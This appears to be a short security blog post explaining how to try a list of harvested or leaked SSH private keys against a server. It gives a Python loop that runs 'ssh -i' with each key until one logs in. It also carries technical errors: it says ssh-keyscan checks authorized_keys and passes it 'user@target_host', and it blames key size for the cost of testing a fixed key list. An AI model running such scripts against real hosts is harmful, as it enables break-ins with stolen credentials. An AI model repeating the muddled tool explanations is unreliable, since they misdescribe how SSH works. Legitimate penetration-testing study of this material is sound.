SSH Brute Force with Key Pairs

G5 Cyber Security

1 week ago

TL;DR

Brute-forcing SSH accounts using key pairs is generally ineffective and slow due to the nature of public/private key cryptography. However, it’s possible if you have a list of potential private keys. This guide outlines how to attempt this (for legitimate penetration testing purposes only) and highlights why it’s usually impractical.

How SSH Key Authentication Works

SSH key authentication relies on cryptographic proof. The server doesn’t ‘guess’ the key; it verifies that you possess the correct private key corresponding to a public key already authorized on the system. This makes traditional brute-forcing (trying many passwords) inapplicable.

Attempting Key Pair Brute Force

Gather Potential Private Keys: This is the hardest part. You need a list of private keys that might be used to access the server. These could come from compromised backups, leaked data, or previous employee accounts. Without this list, brute-forcing is impossible.
Prepare a Key List File: Create a text file (e.g., keys.txt) with one private key per line. Each line should contain the full path to the private key file.
```
/home/user/.ssh/id_rsa
/root/.ssh/another_key
/opt/backup/.ssh/old_key
```
Use a Brute-Force Tool: Several tools can attempt to connect using the keys in your list. ssh-keyscan and custom scripts are common options.
Using ssh-keyscan (for authorized_keys): This isn’t direct brute-forcing, but it helps identify if any of your potential public keys *are already* on the server. It won’t test private key validity.
```
ssh-keyscan user@target_host > known_hosts
```

Custom Script (Example – Python): A more effective approach involves writing a script to iterate through the keys and attempt connections.

import subprocess

with open('keys.txt', 'r') as f:
    for key in f:
        key = key.strip()
        try:
            subprocess.run(['ssh', '-i', key, 'user@target_host'], check=True)
            print(f'Success with key: {key}')
            break # Stop on first successful connection
        except subprocess.CalledProcessError as e:
            print(f'Failed with key: {key} - {e}')

Important: Replace user@target_host with the actual username and hostname.

Run the Script: Execute your Python script (or equivalent) to start the brute-force attempt.
```
python brute_ssh.py
```
Monitor Results: The script will output success or failure messages for each key it tries.

Why This is Usually Impractical

Key Size and Computational Cost: SSH keys are typically 2048-bit or 4096-bit RSA keys, making brute-forcing computationally expensive. Even with powerful hardware, testing a large number of keys can take an extremely long time.
Rate Limiting & Account Lockout: Most servers implement rate limiting and account lockout mechanisms to prevent brute-force attacks. Repeated failed attempts will likely block your IP address or disable the account.
Key Passphrases: If the private keys are protected by passphrases, you’ll need to crack those as well, adding another layer of complexity.
Authorized Keys Only: The server may only allow connections from public keys already in the authorized_keys file. In this case, brute-forcing is pointless unless you have a list of potential authorized keys.

Ethical Considerations

Attempting to gain unauthorized access to any system is illegal and unethical. This guide is for educational purposes only and should only be used with explicit permission from the system owner as part of a legitimate penetration testing exercise.